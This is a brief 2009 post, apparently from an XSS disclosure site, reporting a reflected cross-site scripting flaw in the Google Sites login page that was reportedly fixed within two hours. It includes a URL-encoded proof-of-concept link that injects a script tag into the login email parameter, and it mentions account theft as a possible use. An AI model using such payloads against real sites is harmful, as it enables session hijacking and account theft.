 Google Sites Reflective Cross-Site Scripting
Written by KFFriday, 30 January 2009UPDATE: Fixed in less than 2 hours: clap clap!
Get it while it's hot! Pierre Gardenat submitted a very interesting reflective cross-site scripting vulnerability affecting the login page of Google Sites.
This could be used for example to steal accounts, but don't worry, it will probably be fixed very quickly by Google, just like the last times ;)
Enjoy!
PoC: https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Pierre%20Gardenat%27)%3C%2Fscript%3E&uls=Valider
Mirror: http://www.xssed.com/mirror/57587/
| 
